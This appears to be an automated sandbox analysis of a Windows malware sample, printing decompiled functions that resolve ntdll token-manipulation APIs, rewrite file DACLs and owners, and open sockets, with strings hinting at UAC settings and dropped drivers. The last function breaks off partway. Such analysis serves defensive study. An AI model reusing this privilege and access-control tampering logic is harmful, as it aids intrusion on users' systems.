PromptOnSecureDesktop, xrefs: 0040CC79, 0040CC7E, 0040CC99, 0040CD10, 0040CD29, 0040CFA2, 0040CFA7, 0040CFBD, 0040D0EF, 0040D223, 0040D239, 0040D364, 0040D37A, 0040D80B
srv_time, xrefs: 0040CABB
\, xrefs: 0040D3A7
time_cfg, xrefs: 0040C95B, 0040C962, 0040C971, 0040C984
drivers\, xrefs: 0040D067
.dat, xrefs: 0040D0D7, 0040D138, 0040D1AE, 0040D1D4, 0040D28E, 0040D308, 0040D3CF, 0040D441
flags_upd, xrefs: 0040CE4A
ps, xrefs: 0040CA4E, 0040CB63, 0040D56C, 0040DAD5
4, xrefs: 0040D9F7
wtm_w, xrefs: 0040C96C
lid_file_upd, xrefs: 0040CE6A
.sys, xrefs: 0040D0CC
wtm_r, xrefs: 0040C97F
\, xrefs: 0040D39D
@, xrefs: 0040D754

Memory Dump Source

Source File: 00000000.00000002.656347159.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.656357047.0000000000414000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: File$CloseHandle$AttributesCreate$Writeclosesocket$EnvironmentProcessVariablelstrcat$DeleteDirectorySystemwsprintf$ExitObjectPathSingleSleepTempWaitsend
String ID: .dat$.sys$4$@$PromptOnSecureDesktop$\$\$drivers\$except_info$flags_upd$lid_file_upd$local_time$localcfg$ps$srv_time$time_cfg$work_srv$wtm_c$wtm_r$wtm_w
API String ID: 562065436-2268763213
Opcode ID: fa5b1fc5d8ca6c72a861d45580d43fc756eecdfd68ae3f2a95d00d697c7512a1
Instruction ID: 1bec03d5b3261cfbda03ea9d0ba23ae7472bbf6119f1c93de8fbd0284471d070
Opcode Fuzzy Hash: fa5b1fc5d8ca6c72a861d45580d43fc756eecdfd68ae3f2a95d00d697c7512a1
Instruction Fuzzy Hash: 1BB2B471D00209BBEB209FA4DD85FEA7BB9EB08304F14457BF505B22D1D7789A898B5C

Uniqueness

Uniqueness Score: -1.00%

Function 00401000, Relevance: 56.2, APIs: 16, Strings: 16, Instructions: 170
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401000() {
				struct HINSTANCE__* _t2;
				_Unknown_base(*)()* _t3;
				signed int _t4;
				_Unknown_base(*)()* _t6;
				_Unknown_base(*)()* _t7;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t10;
				_Unknown_base(*)()* _t11;
				_Unknown_base(*)()* _t12;
				_Unknown_base(*)()* _t14;
				_Unknown_base(*)()* _t15;
				_Unknown_base(*)()* _t16;
				_Unknown_base(*)()* _t18;
				_Unknown_base(*)()* _t19;
				_Unknown_base(*)()* _t20;
				_Unknown_base(*)()* _t22;
				_Unknown_base(*)()* _t23;
				signed int _t34;
				signed int _t35;

				_t2 =  *0x413918;
				_t35 = _t34 | 0xffffffff;
				if(_t2 != 0) {
					L3:
					if( *0x41391c == 0 ||  *0x413920 == 0 ||  *0x413924 == 0 ||  *0x413928 == 0 ||  *0x41392c == 0 ||  *0x413930 == 0 ||  *0x413934 == 0 ||  *0x413938 == 0 ||  *0x41393c == 0 ||  *0x413940 == 0 ||  *0x413944 == 0 ||  *0x413948 == 0 ||  *0x41394c == 0 ||  *0x413950 == 0 ||  *0x413954 == 0) {
						_t3 = GetProcAddress(_t2, "RtlExpandEnvironmentStrings_U");
						 *0x41391c = _t3;
						if(_t3 == 0) {
							L34:
							_t4 = _t35;
						} else {
							_t35 = 0xfffffffe;
							_t6 = GetProcAddress( *0x413918, "RtlSetLastWin32Error");
							 *0x413920 = _t6;
							if(_t6 == 0) {
								goto L34;
							} else {
								_t35 = 0xfffffffd;
								_t7 = GetProcAddress( *0x413918, "NtTerminateProcess");
								 *0x413924 = _t7;
								if(_t7 == 0) {
									goto L34;
								} else {
									_t35 = 0xfffffffc;
									_t8 = GetProcAddress( *0x413918, "RtlFreeSid");
									 *0x413928 = _t8;
									if(_t8 == 0) {
										goto L34;
									} else {
										_t35 = 0xfffffffb;
										_t10 = GetProcAddress( *0x413918, "RtlInitUnicodeString");
										 *0x41392c = _t10;
										if(_t10 == 0) {
											goto L34;
										} else {
											_t35 = 0xfffffffa;
											_t11 = GetProcAddress( *0x413918, "NtSetInformationThread");
											 *0x413930 = _t11;
											if(_t11 == 0) {
												goto L34;
											} else {
												_t35 = 0xfffffff9;
												_t12 = GetProcAddress( *0x413918, "NtSetInformationToken");
												 *0x413934 = _t12;
												if(_t12 == 0) {
													goto L34;
												} else {
													_t35 = 0xfffffff8;
													_t14 = GetProcAddress( *0x413918, "RtlNtStatusToDosError");
													 *0x413938 = _t14;
													if(_t14 == 0) {
														goto L34;
													} else {
														_t35 = 0xfffffff7;
														_t15 = GetProcAddress( *0x413918, "NtClose");
														 *0x41393c = _t15;
														if(_t15 == 0) {
															goto L34;
														} else {
															_t35 = 0xfffffff6;
															_t16 = GetProcAddress( *0x413918, "NtOpenProcessToken");
															 *0x413940 = _t16;
															if(_t16 == 0) {
																goto L34;
															} else {
																_t35 = 0xfffffff5;
																_t18 = GetProcAddress( *0x413918, "NtDuplicateToken");
																 *0x413944 = _t18;
																if(_t18 == 0) {
																	goto L34;
																} else {
																	_t35 = 0xfffffff4;
																	_t19 = GetProcAddress( *0x413918, "RtlAllocateAndInitializeSid");
																	 *0x413948 = _t19;
																	if(_t19 == 0) {
																		goto L34;
																	} else {
																		_t35 = 0xfffffff3;
																		_t20 = GetProcAddress( *0x413918, "NtFilterToken");
																		 *0x41394c = _t20;
																		if(_t20 == 0) {
																			goto L34;
																		} else {
																			_t35 = 0xfffffff2;
																			_t22 = GetProcAddress( *0x413918, "RtlLengthSid");
																			 *0x413950 = _t22;
																			if(_t22 == 0) {
																				goto L34;
																			} else {
																				_t35 = 0xfffffff1;
																				_t23 = GetProcAddress( *0x413918, "NtQueryInformationToken");
																				 *0x413954 = _t23;
																				_t1 = _t35 + 0x10; // 0x100000001
																				_t4 = _t1;
																				if(_t23 == 0) {
																					goto L34;
																				}
																			}
																		}
																	}
																}
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
						return _t4;
					} else {
						return 1;
					}
				} else {
					_t2 = LoadLibraryA("ntdll.dll");
					 *0x413918 = _t2;
					if(_t2 != 0) {
						goto L3;
					} else {
						return _t2;
					}
				}
			}

0x00401000
0x00401006
0x0040100b
0x00401023
0x0040102a
0x004010c2
0x004010c4
0x004010cb
0x0040127b
0x0040127b
0x004010d1
0x004010dc
0x004010e1
0x004010e3
0x004010ea
0x00000000
0x004010f0
0x004010fc
0x00401101
0x00401103
0x0040110a
0x00000000
0x00401110
0x0040111c
0x00401121
0x00401123
0x0040112a
0x00000000
0x00401130
0x0040113b
0x00401140
0x00401142
0x00401149
0x00000000
0x0040114f
0x0040115b
0x00401160
0x00401162
0x00401169
0x00000000
0x0040116f
0x0040117b
0x00401180
0x00401182
0x00401189
0x00000000
0x0040118f
0x0040119a
0x0040119f
0x004011a1
0x004011a8
0x00000000
0x004011ae
0x004011ba
0x004011bf
0x004011c1
0x004011c8
0x00000000
0x004011ce
0x004011da
0x004011df
0x004011e1
0x004011e8
0x00000000
0x004011ee
0x004011f9
0x004011fe
0x00401200
0x00401207
0x00000000
0x00401209
0x00401215
0x0040121a
0x0040121c
0x00401223
0x00000000
0x00401225
0x00401231
0x00401236
0x00401238
0x0040123f
0x00000000
0x00401241
0x0040124c
0x00401251
0x00401253
0x0040125a
0x00000000
0x0040125c
0x00401268
0x0040126d
0x0040126f
0x00401276
0x00401276
0x00401279
0x00000000
0x00000000
0x00401279
0x0040125a
0x0040123f
0x00401223
0x00401207
0x004011e8
0x004011c8
0x004011a8
0x00401189
0x00401169
0x00401149
0x0040112a
0x0040110a
0x004010ea
0x0040127f
0x004010ae
0x004010b4
0x004010b4
0x0040100d
0x00401012
0x00401018
0x0040101f
0x00000000
0x00401022
0x00401022
0x00401022
0x0040101f

APIs

LoadLibraryA.KERNEL32(ntdll.dll,00000000,00401839,00409646), ref: 00401012
GetProcAddress.KERNEL32(?,RtlExpandEnvironmentStrings_U,00000000,00000000,00401839,00409646), ref: 004010C2
GetProcAddress.KERNEL32(?,RtlSetLastWin32Error), ref: 004010E1
GetProcAddress.KERNEL32(?,NtTerminateProcess), ref: 00401101
GetProcAddress.KERNEL32(?,RtlFreeSid), ref: 00401121
GetProcAddress.KERNEL32(?,RtlInitUnicodeString), ref: 00401140
GetProcAddress.KERNEL32(?,NtSetInformationThread), ref: 00401160
GetProcAddress.KERNEL32(?,NtSetInformationToken), ref: 00401180
GetProcAddress.KERNEL32(?,RtlNtStatusToDosError), ref: 0040119F
GetProcAddress.KERNEL32(?,NtClose), ref: 004011BF
GetProcAddress.KERNEL32(?,NtOpenProcessToken), ref: 004011DF
GetProcAddress.KERNEL32(?,NtDuplicateToken), ref: 004011FE
GetProcAddress.KERNEL32(?,RtlAllocateAndInitializeSid), ref: 0040121A

Strings

RtlSetLastWin32Error, xrefs: 004010D6
RtlFreeSid, xrefs: 00401116
NtClose, xrefs: 004011B4
NtOpenProcessToken, xrefs: 004011D4
NtTerminateProcess, xrefs: 004010F6
RtlExpandEnvironmentStrings_U, xrefs: 004010BC
RtlLengthSid, xrefs: 00401246
NtDuplicateToken, xrefs: 004011F3
NtQueryInformationToken, xrefs: 00401262
RtlInitUnicodeString, xrefs: 00401135
NtSetInformationThread, xrefs: 00401155
NtSetInformationToken, xrefs: 00401175
RtlNtStatusToDosError, xrefs: 00401194
NtFilterToken, xrefs: 0040122B
ntdll.dll, xrefs: 0040100D
RtlAllocateAndInitializeSid, xrefs: 0040120F

Memory Dump Source

Source File: 00000000.00000002.656347159.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.656357047.0000000000414000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: NtClose$NtDuplicateToken$NtFilterToken$NtOpenProcessToken$NtQueryInformationToken$NtSetInformationThread$NtSetInformationToken$NtTerminateProcess$RtlAllocateAndInitializeSid$RtlExpandEnvironmentStrings_U$RtlFreeSid$RtlInitUnicodeString$RtlLengthSid$RtlNtStatusToDosError$RtlSetLastWin32Error$ntdll.dll
API String ID: 2238633743-3228201535
Opcode ID: 099c329b46637f9171a1ca57a4c5e0107e32006a0b8f6d8903d04b45664d461e
Instruction ID: c8dd2db2df3f08e17c6117e54d1286841a2c4197db930f8a9693796d5e259140
Opcode Fuzzy Hash: 099c329b46637f9171a1ca57a4c5e0107e32006a0b8f6d8903d04b45664d461e
Instruction Fuzzy Hash: 2F5100B1662641A6D7118F69EC84BD23AE86748372F14837B9520F62F0D7F8CAC1CB5D

Uniqueness

Uniqueness Score: -1.00%

Function 0040B211, Relevance: 47.4, APIs: 7, Strings: 20, Instructions: 131
timeCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E0040B211(FILETIME* _a4, CHAR* _a8, signed int _a12) {
				struct _FILETIME _v12;
				struct _SYSTEMTIME _v28;
				CHAR* _v32;
				CHAR* _v36;
				CHAR* _v40;
				CHAR* _v44;
				CHAR* _v48;
				CHAR* _v52;
				CHAR* _v56;
				CHAR* _v60;
				CHAR* _v64;
				CHAR* _v68;
				CHAR* _v72;
				CHAR* _v76;
				CHAR* _v80;
				CHAR* _v84;
				CHAR* _v88;
				CHAR* _v92;
				CHAR* _v96;
				CHAR* _v100;
				CHAR* _v104;
				struct _TIME_ZONE_INFORMATION _v276;
				long _t77;
				signed int _t80;
				signed int _t93;
				signed int _t101;
				signed int _t102;
				CHAR* _t103;
				signed int _t104;
				signed short _t106;
				signed short _t109;
				signed int _t114;
				signed int _t115;
				void* _t117;

				_v56 = "Sun";
				_v52 = "Mon";
				_v48 = "Tue";
				_v44 = "Wed";
				_v40 = "Thu";
				_v36 = "Fri";
				_v32 = "Sat";
				_v104 = "Jan";
				_v100 = "Feb";
				_v96 = "Mar";
				_v92 = "Apr";
				_v88 = "May";
				_v84 = "Jun";
				_v80 = "Jul";
				_v76 = "Aug";
				_v72 = "Sep";
				_v68 = "Oct";
				_v64 = "Nov";
				_v60 = "Dec";
				if(_a4 != 0) {
					FileTimeToLocalFileTime(_a4,  &_v12);
					FileTimeToSystemTime( &_v12,  &_v28);
				} else {
					GetLocalTime( &_v28);
				}
				_t114 = _a12;
				if(_t114 != 0) {
					SystemTimeToFileTime( &_v28,  &_v12);
					_t93 = E0040ECA5();
					if(_t114 <= 0) {
						_t104 = _t93 %  ~_t114 * 0x23c34600;
						_v12.dwLowDateTime = _v12.dwLowDateTime - _t104;
						asm("sbb [ebp-0x4], ebx");
					} else {
						_t104 = _t93 % _t114 * 0x23c34600;
						_v12.dwLowDateTime = _v12.dwLowDateTime + _t104;
						asm("adc [ebp-0x4], ebx");
					}
					FileTimeToSystemTime( &_v12,  &_v28);
				}
				_v276.Bias = 0;
				_t77 = GetTimeZoneInformation( &_v276);
				_t101 = _v276.Bias;
				if(_t77 == 2) {
					_t101 = _t101 + _v276.DaylightBias;
				}
				_t102 =  ~_t101;
				asm("cdq");
				_t80 = (_t102 ^ _t104) - _t104;
				if(_v28.wDayOfWeek > 6) {
					_t109 = 6;
					_v28.wDayOfWeek = _t109;
				}
				if(_v28.wMonth == 0) {
					_v28.wMonth = 1;
				}
				if(_v28.wMonth > 0xc) {
					_t106 = 0xc;
					_v28.wMonth = _t106;
				}
				_t103 = "+";
				if(_t102 < 0) {
					_t103 = "-";
				}
				_t115 = 0x3c;
				asm("cdq");
				return wsprintfA(_a8, "%s, %u %s %u %.2u:%.2u:%.2u %s%.2u%.2u",  *((intOrPtr*)(_t117 + (_v28.wDayOfWeek & 0x0000ffff) * 4 - 0x34)), _v28.wDay & 0x0000ffff,  *((intOrPtr*)(_t117 + (_v28.wMonth & 0x0000ffff) * 4 - 0x68)), _v28.wYear & 0x0000ffff, _v28.wHour & 0x0000ffff, _v28.wMinute & 0x0000ffff, _v28.wSecond & 0x0000ffff, _t103, _t80 / _t115, _t80 % _t115);
			}

0x0040b225
0x0040b22c
0x0040b233
0x0040b23a
0x0040b241
0x0040b248
0x0040b24f
0x0040b256
0x0040b25d
0x0040b264
0x0040b26b
0x0040b272
0x0040b279
0x0040b280
0x0040b287
0x0040b28e
0x0040b295
0x0040b29c
0x0040b2a3
0x0040b2ad
0x0040b2c2
0x0040b2d0
0x0040b2af
0x0040b2b3
0x0040b2b3
0x0040b2d2
0x0040b2d7
0x0040b2e1
0x0040b2e7
0x0040b2f0
0x0040b306
0x0040b30c
0x0040b30f
0x0040b2f2
0x0040b2f4
0x0040b2fa
0x0040b2fd
0x0040b2fd
0x0040b31a
0x0040b31a
0x0040b323
0x0040b329
0x0040b32f
0x0040b338
0x0040b33a
0x0040b33a
0x0040b33d
0x0040b341
0x0040b344
0x0040b34b
0x0040b34f
0x0040b350
0x0040b350
0x0040b358
0x0040b35d
0x0040b35d
0x0040b366
0x0040b36a
0x0040b36b
0x0040b36b
0x0040b371
0x0040b376
0x0040b378
0x0040b378
0x0040b37f
0x0040b380
0x0040b3c4

APIs

GetLocalTime.KERNEL32(0003E800,?,0003E800,00000000), ref: 0040B2B3
FileTimeToLocalFileTime.KERNEL32(00000000,00000000,?,0003E800,00000000), ref: 0040B2C2
FileTimeToSystemTime.KERNEL32(00000000,0003E800), ref: 0040B2D0
SystemTimeToFileTime.KERNEL32(0003E800,00000000), ref: 0040B2E1
FileTimeToSystemTime.KERNEL32(00000000,0003E800), ref: 0040B31A
GetTimeZoneInformation.KERNEL32(?), ref: 0040B329
wsprintfA.USER32 ref: 0040B3B7

Strings

Aug, xrefs: 0040B287
Sat, xrefs: 0040B24F
Mon, xrefs: 0040B22C
Tue, xrefs: 0040B233
Sep, xrefs: 0040B28E
Jul, xrefs: 0040B280
Sun, xrefs: 0040B225
Wed, xrefs: 0040B23A
Thu, xrefs: 0040B241
Apr, xrefs: 0040B26B
Oct, xrefs: 0040B295
Feb, xrefs: 0040B25D
Fri, xrefs: 0040B248
Dec, xrefs: 0040B2A3
Nov, xrefs: 0040B29C
%s, %u %s %u %.2u:%.2u:%.2u %s%.2u%.2u, xrefs: 0040B3AF
Jan, xrefs: 0040B256
May, xrefs: 0040B272
Mar, xrefs: 0040B264
Jun, xrefs: 0040B279

Memory Dump Source

Source File: 00000000.00000002.656347159.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.656357047.0000000000414000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: Time$File$System$Local$InformationZonewsprintf
String ID: %s, %u %s %u %.2u:%.2u:%.2u %s%.2u%.2u$Apr$Aug$Dec$Feb$Fri$Jan$Jul$Jun$Mar$May$Mon$Nov$Oct$Sat$Sep$Sun$Thu$Tue$Wed
API String ID: 766114626-2976066047
Opcode ID: fbb2cc535003bdd2a03704f06e43c86ec17b275768f9954b8d174276db173d5b
Instruction ID: 3cccae2c5b68faf9d5e65ebc3321ef0303f497beb4f825406ae493c25d793f5b
Opcode Fuzzy Hash: fbb2cc535003bdd2a03704f06e43c86ec17b275768f9954b8d174276db173d5b
Instruction Fuzzy Hash: D8510EB1D0021CAADF18DFD5D8495EEBBB9EF48304F10856BE501B6250E7B84AC9CF98

Uniqueness

Uniqueness Score: -1.00%

Function 00407809, Relevance: 38.7, APIs: 21, Strings: 1, Instructions: 226
memoryCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E00407809(CHAR* _a4, signed int _a8) {
				signed int _v8;
				void* _v12;
				void* _v16;
				struct _ACL* _v20;
				signed int _v24;
				int _v28;
				long _v32;
				long _v36;
				long _v40;
				long _v44;
				int _v48;
				int _v52;
				union _SID_NAME_USE _v56;
				int _v60;
				void _v128;
				char _v384;
				char _v512;
				struct _SECURITY_DESCRIPTOR _v1536;
				struct _ACL* _t110;
				int _t120;
				intOrPtr _t121;
				signed int _t123;
				signed int _t141;
				char* _t146;
				signed int _t153;
				void* _t154;
				void* _t155;
				void* _t156;

				_t141 = 0;
				_v28 = 0;
				_v20 = 0;
				_v36 = 0x80;
				if(GetUserNameA( &_v384,  &_v36) == 0) {
					L42:
					return _v28;
				}
				_v32 = 0x44;
				_v40 = 0x80;
				if(LookupAccountNameA(0,  &_v384,  &_v128,  &_v32,  &_v512,  &_v40,  &_v56) == 0) {
					goto L42;
				}
				_v32 = GetLengthSid( &_v128);
				_v44 = 0x400;
				if(GetFileSecurityA(_a4, 5,  &_v1536, 0x400,  &_v44) == 0) {
					goto L42;
				} else {
					if(GetSecurityDescriptorOwner( &_v1536,  &_v16,  &_v48) != 0) {
						_v36 = 0x80;
						_v40 = 0x80;
						if(EqualSid( &_v128, _v16) == 0) {
							_v28 = 1;
							_t155 = LocalAlloc(0x40, 0x14);
							if(_t155 != 0) {
								LocalFree(_t155);
							}
						}
					}
					_v24 = _t141;
					if(GetSecurityDescriptorDacl( &_v1536,  &_v60,  &_v20,  &_v52) == 0) {
						L41:
						goto L42;
					}
					_t110 = _v20;
					if(_t110 == _t141) {
						goto L41;
					}
					_v8 = _v8 & _t141;
					if(0 >= _t110->AceCount) {
						goto L41;
					} else {
						goto L13;
					}
					do {
						L13:
						if(GetAce(_t110, _v8,  &_v12) == 0) {
							L32:
							_v8 = _v8 + 1;
							goto L33;
						}
						_t153 = 0;
						_v16 = _v12 + 8;
						if(_t141 <= 0) {
							L19:
							if(_t141 < 0x20) {
								 *((intOrPtr*)(_t156 + _t141 * 4 - 0xfc)) = _v16;
								_t141 = _t141 + 1;
							}
							_t120 = EqualSid( &_v128, _v16);
							_t146 = _v12;
							if(_t120 == 0) {
								_t121 = 0x1200a8;
							} else {
								asm("sbb eax, eax");
								_t121 = ( ~_a8 & 0x00090046) + 0x1601b9;
							}
							if( *((intOrPtr*)(_t146 + 4)) != _t121) {
								 *((intOrPtr*)(_t146 + 4)) = _t121;
								_t146 = _v12;
								_v24 = 1;
							}
							if( *_t146 != 0 || ( *(_t146 + 1) & 0x00000010) != 0) {
								 *_t146 = 0;
								_t66 = _v16 + 8; // 0xc8685f74
								_t123 =  *_t66;
								if(_t123 != 0) {
									 *((char*)(_v12 + 1)) = (_t123 & 0xffffff00 | _t123 - 0x00000050 > 0x00000000) + 2;
								} else {
									 *((char*)(_v12 + 1)) = 0xb;
								}
								_v24 = 1;
							}
							goto L32;
						}
						while(EqualSid( *(_t156 + _t153 * 4 - 0xfc), _v16) == 0) {
							_t153 = _t153 + 1;
							if(_t153 < _t141) {
								continue;
							}
							break;
						}
						if(_t153 >= _t141) {
							goto L19;
						}
						DeleteAce(_v20, _v8);
						_v24 = 1;
						L33:
						_t110 = _v20;
					} while (_v8 < (_t110->AceCount & 0x0000ffff));
					if(_v24 != 0) {
						_v28 = 1;
						_t154 = LocalAlloc(0x40, 0x14);
						if(_t154 != 0) {
							if(InitializeSecurityDescriptor(_t154, 1) != 0 && SetSecurityDescriptorDacl(_t154, 1, _v20, 0) != 0 && SetFileSecurityA(_a4, 4, _t154) != 0) {
								_v28 = 1;
							}
							LocalFree(_t154);
						}
					}
					goto L41;
				}
			}

0x0040781e
0x00407826
0x00407829
0x0040782c
0x00407837
0x00407a8e
0x00407a94
0x00407a94
0x0040785c
0x00407863
0x0040786e
0x00000000
0x00000000
0x0040787e
0x0040788b
0x004078a2
0x00000000
0x004078a8
0x004078c3
0x004078cc
0x004078cf
0x004078da
0x004078e0
0x004078e9
0x004078ed
0x00407917
0x00407917
0x004078ed
0x004078da
0x00407930
0x0040793b
0x00407a8d
0x00000000
0x00407a8d
0x00407941
0x00407946
0x00000000
0x00000000
0x0040794c
0x00407955
0x00000000
0x00000000
0x00000000
0x00000000
0x0040795b
0x0040795b
0x0040796b
0x00407a2a
0x00407a2a
0x00000000
0x00407a2a
0x00407977
0x00407979
0x0040797e
0x004079ae
0x004079b1
0x004079b6
0x004079bd
0x004079bd
0x004079c5
0x004079cb
0x004079d0
0x004079e5
0x004079d2
0x004079d7
0x004079de
0x004079de
0x004079ed
0x004079ef
0x004079f2
0x004079f5
0x004079f5
0x004079fb
0x00407a03
0x00407a09
0x00407a09
0x00407a0e
0x00407a24
0x00407a10
0x00407a13
0x00407a13
0x00407a27
0x00407a27
0x00000000
0x004079fb
0x00407980
0x00407994
0x00407997
0x00000000
0x00000000
0x00000000
0x00407997
0x0040799b
0x00000000
0x00000000
0x004079a3
0x004079a9
0x00407a2d
0x00407a2d
0x00407a34
0x00407a41
0x00407a47
0x00407a50
0x00407a54
0x00407a60
0x00407a83
0x00407a83
0x00407a87
0x00407a87
0x00407a54
0x00000000
0x00407a41

APIs

GetUserNameA.ADVAPI32(?,?), ref: 0040782F
LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,?), ref: 00407866
GetLengthSid.ADVAPI32(?), ref: 00407878
GetFileSecurityA.ADVAPI32(?,00000005,?,00000400,?), ref: 0040789A
GetSecurityDescriptorOwner.ADVAPI32(?,00407F63,?), ref: 004078B8
EqualSid.ADVAPI32(?,00407F63), ref: 004078D2
LocalAlloc.KERNEL32(00000040,00000014), ref: 004078E3
InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 004078F1
SetSecurityDescriptorOwner.ADVAPI32(00000000,?,00000000), ref: 00407901
SetFileSecurityA.ADVAPI32(?,00000001,00000000), ref: 00407910
LocalFree.KERNEL32(00000000), ref: 00407917
GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00407933
GetAce.ADVAPI32(?,00000000,?), ref: 00407963
EqualSid.ADVAPI32(?,00407F63), ref: 0040798A
DeleteAce.ADVAPI32(?,00000000), ref: 004079A3
EqualSid.ADVAPI32(?,00407F63), ref: 004079C5
LocalAlloc.KERNEL32(00000040,00000014), ref: 00407A4A
InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00407A58
SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,?,00000000), ref: 00407A69
SetFileSecurityA.ADVAPI32(?,00000004,00000000), ref: 00407A79
LocalFree.KERNEL32(00000000), ref: 00407A87

Strings

D, xrefs: 0040785C

Memory Dump Source

Source File: 00000000.00000002.656347159.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.656357047.0000000000414000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: Security$Descriptor$Local$EqualFile$AllocDaclFreeInitializeNameOwner$AccountDeleteLengthLookupUser
String ID: D
API String ID: 3722657555-2746444292
Opcode ID: bb30bf074c347c8653546d93d28bb934471e976575b6637e302f0e375d0d0c6d
Instruction ID: df0c13f2d89176358eaf39038022480abc221899387876bf5e0f356ce13a0778
Opcode Fuzzy Hash: bb30bf074c347c8653546d93d28bb934471e976575b6637e302f0e375d0d0c6d
Instruction Fuzzy Hash: 59813C71E04119ABDB11CFA5DD44FEFBBB8AB08340F14817AE505F6290D739AA41CF69

Uniqueness

Uniqueness Score: -1.00%

Function 00402A62, Relevance: 33.4, APIs: 18, Strings: 1, Instructions: 194
networkmemoryCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E00402A62(void* __ecx, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr* _v44;
				signed short _v272;
				char _v276;
				long _v280;
				char _v284;
				signed short _v288;
				signed short _v292;
				long _v300;
				long _v304;
				intOrPtr _v308;
				signed short _v324;
				intOrPtr _v332;
				signed short _v336;
				signed int _v340;
				signed int _v344;
				void* _v348;
				signed short _v352;
				signed short _v356;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t53;
				signed short _t66;
				void** _t71;
				void* _t76;
				void* _t77;
				void* _t78;
				signed short _t79;
				intOrPtr* _t81;
				signed short _t82;
				signed short _t83;
				intOrPtr _t86;
				signed int _t88;
				void* _t90;
				long _t91;
				signed short _t92;
				void* _t94;

				_t77 = __ecx;
				_t91 = 0;
				 *_a12 = 1;
				_t50 = HeapAlloc(GetProcessHeap(), 0, 0x1000);
				_t76 = _t50;
				if(_t76 != 0) {
					__imp__#23(2, 2, 0x11, _t78);
					_t79 = _t50;
					_v288 = _t79;
					if(_t79 == 0 || _t79 == 0xffffffff) {
						HeapFree(GetProcessHeap(), _t91, _t76);
						_t53 = 0;
						goto L37;
					} else {
						_v304 = 0;
						while(1) {
							_v300 = _t91;
							if(_v304 != _t91) {
								_push(_t91);
							} else {
								_push(0x100);
							}
							__imp__#9();
							_t50 = E004026FF(_v8, _t79, _v12, _t50 & 0x0000ffff);
							_t94 = _t94 + 0xc;
							if(_t50 != 0) {
								goto L32;
							}
							_t86 = 0xc;
							_t50 =  &_v276;
							_v272 = _t79;
							_v276 = 1;
							_v284 = _t86;
							_v280 = _t91;
							__imp__#18(_t91, _t50, _t91, _t91,  &_v284);
							if(_t50 <= 0) {
								goto L32;
							}
							_t50 = E0040EE2A(_t77, _t76, _t91, 4);
							_t94 = _t94 + 0xc;
							__imp__#16(_t79, _t76, 0x1000, _t91);
							_t92 = _t50;
							_v324 = _t92;
							if(_t92 > 0 && _t92 > _t86) {
								_t81 = __imp__#15;
								_t88 =  *_t81( *(_t76 + 2) & 0x0000ffff) & 0xf;
								if(_t88 == 3) {
									L34:
									 *_v44 = 2;
									L35:
									HeapFree(GetProcessHeap(), 0, _t76);
									__imp__#3(_v292);
									_t53 = _v308;
									L37:
									return _t53;
								}
								if(_t88 != 2) {
									L16:
									if(_t88 != 0) {
										goto L32;
									}
									_t50 = E00402923(_t77, _t76, _t92);
									_pop(_t77);
									_v336 = _t50;
									if(_t50 == 0) {
										goto L32;
									}
									_v340 = _v340 & 0x00000000;
									_v344 = _v344 & 0x00000000;
									_t82 = _t50;
									_v352 = _t82;
									L20:
									while(1) {
										if( *((short*)(_t82 + 0x10a)) != 1 ||  *((short*)(_t82 + 0x108)) != 0xf ||  *((short*)(_t82 + 0x10c)) < 3) {
											L30:
											_t83 =  *_t82;
											_v352 = _t83;
											if(_t83 != 0) {
												_t82 = _v352;
												continue;
											}
											goto L31;
										} else {
											_t90 = HeapAlloc(GetProcessHeap(), 0, 0x108);
											if(_t90 == 0) {
												L31:
												_t50 = E00402904(_v336);
												if(_v344 != 0) {
													goto L35;
												}
												goto L32;
											}
											E0040EE2A(_t77, _t90, 0, 0x108);
											_t66 =  *( *((intOrPtr*)(_t82 + 0x110)) + _t76) & 0x0000ffff;
											_t94 = _t94 + 0xc;
											__imp__#15();
											 *(_t90 + 4) = _t66 & 0x0000ffff;
											_t33 = _t90 + 8; // 0x8
											E00402871( *((intOrPtr*)(_t82 + 0x110)) + 2, _t76, _t77, _t33, _v332);
											_t77 = _t66;
											if( *((char*)(_t90 + 8)) != 0) {
												_t71 = _v344;
												_v344 = _t90;
												if(_t71 != 0) {
													 *_t71 = _t90;
												} else {
													_v348 = _t90;
												}
											} else {
												HeapFree(GetProcessHeap(), 0, _t90);
											}
											_t82 = _v356;
											goto L30;
										}
									}
								}
								_push( *(_t76 + 2) & 0x0000ffff);
								if( *_t81() < 0) {
									goto L34;
								}
								goto L16;
							}
							L32:
							_v308 = _v308 + 1;
							if(_v308 < 2) {
								_t79 = _v292;
								_t91 = 0;
								continue;
							}
							goto L35;
						}
					}
				}
				return 0;
			}

0x00402a62
0x00402a7a
0x00402a7d
0x00402a86
0x00402a8c
0x00402a90
0x00402aa0
0x00402aa6
0x00402aa8
0x00402aae
0x00402cd8
0x00402cde
0x00000000
0x00402abd
0x00402abd
0x00402ac9
0x00402ac9
0x00402ad1
0x00402ada
0x00402ad3
0x00402ad3
0x00402ad3
0x00402adb
0x00402af4
0x00402af9
0x00402afe
0x00000000
0x00000000
0x00402b06
0x00402b0e
0x00402b14
0x00402b18
0x00402b20
0x00402b24
0x00402b28
0x00402b30
0x00000000
0x00000000
0x00402b3a
0x00402b3f
0x00402b4a
0x00402b50
0x00402b52
